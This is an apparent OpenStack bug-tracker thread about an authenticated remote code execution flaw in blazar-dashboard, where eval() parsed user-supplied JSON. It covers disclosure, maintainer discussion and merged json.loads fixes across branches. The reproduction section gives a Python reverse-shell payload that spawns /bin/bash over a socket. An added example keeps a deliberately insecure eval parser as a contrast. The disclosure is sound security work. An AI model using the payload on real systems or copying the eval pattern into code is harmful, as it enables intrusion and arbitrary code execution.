Authenticated RCE in blazar-dashboard via python expression in POST parameters

Bug #1895688 reported by Lukas
| Affects | Status       | Importance | Assigned to   | Milestone |
| ------- | ------------ | ---------- | ------------- | --------- |
| Blazar  | Fix Released | Critical   | Pierre Riteau |           |

Bug Description

# Description
Several endpoints in blazar-dashboard use the python `eval` function to parse raw user input which is expected to be in JSON format. This can be exploited by an authenticated user to gain arbitrary code execution on the Horizon host.

# Reproduction
- Log into Horizon (blazar_dashboard must be installed and enabled)
- Navigate to `Admin` -> `Reservation` -> `Hosts`
- Click `+ Create Hosts`
- Enter a python expression in the text area under `Extra Capabilities`
  - It is also possible to execute python code containing multiple statements by wrapping it into an `exec('<python code>')` call
  - The attached video shows how a reverse shell can be achieved using this payload: `exec('import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")')`
- Click `Create Hosts`

# Suggested fix
1.) Use `json.loads` instead of `eval` to parse JSON data
Only the `extra_caps` parameter could be tested due to problems with the local testing setup. However, the attached patch replaces all 4 usages of `eval` within the blazar_dashboard project, as they seem likely to contain additional vulnerabilities.
Please note that this change will break some hopefully unused functionality, like:
- arithmetic expressions in property values
```
{
    "key": 1300 + 37
}
```
- pseudo JSON using single quotes instead of double quotes
```
{
    'key': 1337
}
```
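As an added example (not part of the report or of blazar-dashboard's code), the `eval` pattern described above beside a `json.loads`-based replacement, run over the two "breaking" inputs the reporter lists; the function names, the scalar-value rule and the sample inputs are assumptions.

```python
import json

# Added example, not blazar-dashboard code. `parse_with_eval` is the pre-fix
# pattern the report describes; `parse_extra_caps` is the json.loads-based
# replacement. Helper names and the scalar-value rule are assumptions.


def parse_with_eval(raw: str):
    """Pre-fix pattern: the field is evaluated as a Python expression, so
    '1300 + 37' is computed and single-quoted keys are accepted. Kept only
    as the 'before' half of the comparison."""
    return eval(raw)  # deliberately insecure, see docstring


def parse_extra_caps(raw: str) -> dict:
    """Hardened replacement: strict JSON, top-level object, scalar values."""
    try:
        value = json.loads(raw)
    except json.JSONDecodeError as exc:
        # Arithmetic and single quotes land here instead of being executed.
        raise ValueError(f"extra capabilities must be valid JSON: {exc.msg}") from None
    if not isinstance(value, dict):
        raise ValueError("extra capabilities must be a JSON object")
    for key, item in value.items():
        if not isinstance(item, (str, int, float, bool)):
            raise ValueError(f"capability {key!r} must be a string, number or bool")
    return value


def accepts(raw: str) -> bool:
    """True if the hardened parser accepts `raw`, False if it rejects it."""
    try:
        parse_extra_caps(raw)
    except ValueError:
        return False
    return True


# Constructed inputs: the two cases the report says will stop working, plus
# one well-formed object.
ARITHMETIC = '{\n    "key": 1300 + 37\n}'
SINGLE_QUOTED = "{\n    'key': 1337\n}"
VALID = '{"gpu": "true", "rack": "r12"}'

if __name__ == "__main__":
    print("eval:", parse_with_eval(ARITHMETIC))  # {'key': 1337}
    for name, raw in [("arithmetic", ARITHMETIC), ("single-quoted", SINGLE_QUOTED), ("valid", VALID)]:
        print(f"json.loads accepts {name}: {accepts(raw)}")
```

The same `json.JSONDecodeError` path is what turns the four `eval` call sites into parse errors once the patch is applied, which is why the reporter flags the two inputs above as functionality that will break.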

Revision history for this message
Lukas (lukas-eu) wrote :

Replacing all instances of `eval` with json.parse

Revision history for this message
Lukas (lukas-eu) wrote :

Typo in previous comment: Patch replaces all instances of `eval` with `json.loads`

Revision history for this message
Jeremy Stanley (fungi) wrote :

I agree this sounds like a problem. I'm not especially familiar with use of Blazar, but it sounds like these JSON payloads are expected to come from sources other than the operator of the Horizon host, in which case this definitely represents at least privilege escalation.

Pierre: in your opinion would it be possible to include the included patch or something like it in a Victoria release candidate (as in by early next week)? If not, we're probably better off delaying any advisory until after release week and then backporting it in a stable point release just after.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Also I do strongly recommend adding bandit to the linters for your projects, as it explicitly identifies use of eval/exec in your source code (among other common risks).

Revision history for this message
Pierre Riteau (priteau) wrote :

@Jeremy: Out of the four uses of eval, one is parsing data coming from Nova and two others are input from a Horizon admin. Unfortunately, the last one is parsing user input in the Update Lease form using the field titled "Reservation values to update".

Revision history for this message
Pierre Riteau (priteau) wrote :

We should be able to merge this for Victoria.

Pierre Riteau (priteau)
information type: Private Security → Public Security
Changed in blazar:
status: New → Confirmed
importance: Undecided → Critical
assignee: nobody → Pierre Riteau (priteau)
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (master)

Fix proposed to branch: master
Review: https://review.opendev.org/755810

Changed in blazar:
status: Confirmed → In Progress
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (stable/ussuri)

Fix proposed to branch: stable/ussuri
Review: https://review.opendev.org/755812

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (stable/train)

Fix proposed to branch: stable/train
Review: https://review.opendev.org/755813

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (stable/stein)

Fix proposed to branch: stable/stein
Review: https://review.opendev.org/755814

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (master)

Reviewed: https://review.opendev.org/755810
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=33c58438abf8221291d264db26a061279d4f22c7
Submitter: Zuul
Branch: master

commit 33c58438abf8221291d264db26a061279d4f22c7
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688

Changed in blazar:
status: In Progress → Fix Released
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (stable/ussuri)

Reviewed: https://review.opendev.org/755812
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=168b4ae052480912fa6fdd2c77e16cd871528303
Submitter: Zuul
Branch: stable/ussuri

commit 168b4ae052480912fa6fdd2c77e16cd871528303
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-ussuri
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (stable/train)

Reviewed: https://review.opendev.org/755813
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=63e9c5d25617467016eea1dff0a34803c86b0953
Submitter: Zuul
Branch: stable/train

commit 63e9c5d25617467016eea1dff0a34803c86b0953
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-train
tags: added: in-stable-stein
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (stable/stein)

Reviewed: https://review.opendev.org/755814
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=ee10b2c5c195088ec14725b790c17289ad20ed63
Submitter: Zuul
Branch: stable/stein

commit ee10b2c5c195088ec14725b790c17289ad20ed63
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (stable/victoria)

Fix proposed to branch: stable/victoria
Review: https://review.opendev.org/756064

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (stable/victoria)

Reviewed: https://review.opendev.org/756064
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=5c7608dfa24dc5a5a3f18af09d35e8ea8760aee5
Submitter: Zuul
Branch: stable/victoria

commit 5c7608dfa24dc5a5a3f18af09d35e8ea8760aee5
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-victoria
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/blazar-dashboard 5.0.0.0rc1

This issue was fixed in the openstack/blazar-dashboard 5.0.0.0rc1 release candidate.
